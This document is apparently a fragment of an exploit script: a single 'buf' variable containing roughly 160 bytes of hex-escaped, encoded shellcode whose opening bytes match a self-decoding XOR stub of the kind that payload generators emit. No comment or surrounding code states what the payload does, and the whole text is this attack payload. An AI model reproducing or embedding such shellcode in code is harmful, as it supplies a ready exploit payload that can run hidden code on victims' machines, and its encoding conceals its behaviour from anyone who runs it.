buf = 
"\xd9\xe5\xbd\xe5\xf6\x87\x4a\xd9\x74\x24\xf4\x5a\x2b\xc9" +
"\xb1\x23\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\x07\x03\x5c" +
"\x87\x7a\xe5\xe1\xaf\xdb\x2f\x91\xeb\x17\x90\x71\x3d\x66" +
"\x33\xb7\xd2\x92\xcf\x58\xd0\xa1\xa0\xb0\xcb\x59\x06\xf9" +
"\xd9\xe6\xb5\x73\xfa\x86\x76\xd5\x41\x98\x08\x75\x5c\xdc" +
"\x69\xea\xc1\x29\x5d\x7d\x5b\xc1\x99\xb5\x0d\xab\x95\x3c" +
"\x59\x47\xe8\xfa\xf1\x69\x08\x6f\x62\x56\xf7\x90\xb1\xa1" +
"\x31\x20\xd4\x02\x5d\xc5\xe8\xde\x78\x01\x20\x04\x5b\xd3" +
"\x67\xcc\xd6\x7c\x14\x86\xf1\x29\x74\x7b\xc5\xf7\x11\x9b" +
"\x33\x97\xb2\x40\x19\x7f\x65\x06\xbc\xd7\x7b\x77\x0c\x42" +
"\x69\xcd\xc8\x7a\x9a\x07\xfb\x06\x3f\x1d\xe6\x19\x20\x90" +
"\x11\xfb\x62\x79\x26\x45\x94\x1c\x34\x4e\x58"
